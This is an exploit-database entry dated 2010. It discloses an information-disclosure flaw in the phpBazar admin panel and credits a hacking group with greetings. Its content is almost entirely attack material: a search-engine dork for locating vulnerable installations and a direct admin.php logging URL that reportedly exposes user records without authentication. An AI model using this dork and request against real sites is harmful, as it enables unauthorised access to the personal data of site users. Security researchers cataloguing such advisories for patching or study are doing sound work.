phpBazar Admin - Information Disclosure



EKU-ID: 20929 CVE: OSVDB-ID:
Author: Net_Spy Published: 2010-07-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


=====================================
phpBazar admin information discloser Vulnerability
=====================================

Author                 :: Net_Spy
Group                  :: Aras cyber Army
Email                  :: tvc82_2002@yahoo.com
Discover               :: 1 july 2010
Critical Lvl           :: M
Published              :: 22 july 2010
Vendor                 :: http://www.smartisoft.com/
---------------------------------------------------------------------------
~~~~~~~~~

Dork                   :: intitle: phpBazar-AdminPanel

~~~~~~~~~~~~~~~~~~

demo                   :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0


~~~~~~~~~~~~~~~~~~~~~~~~~

Example Just For Edu   :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+++++++++++++++++++++++++++++++++++++++
[!] greetiz to ::
    DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
    All aras cyber amry members

+++++++++++++++++++++++++++++++++++++++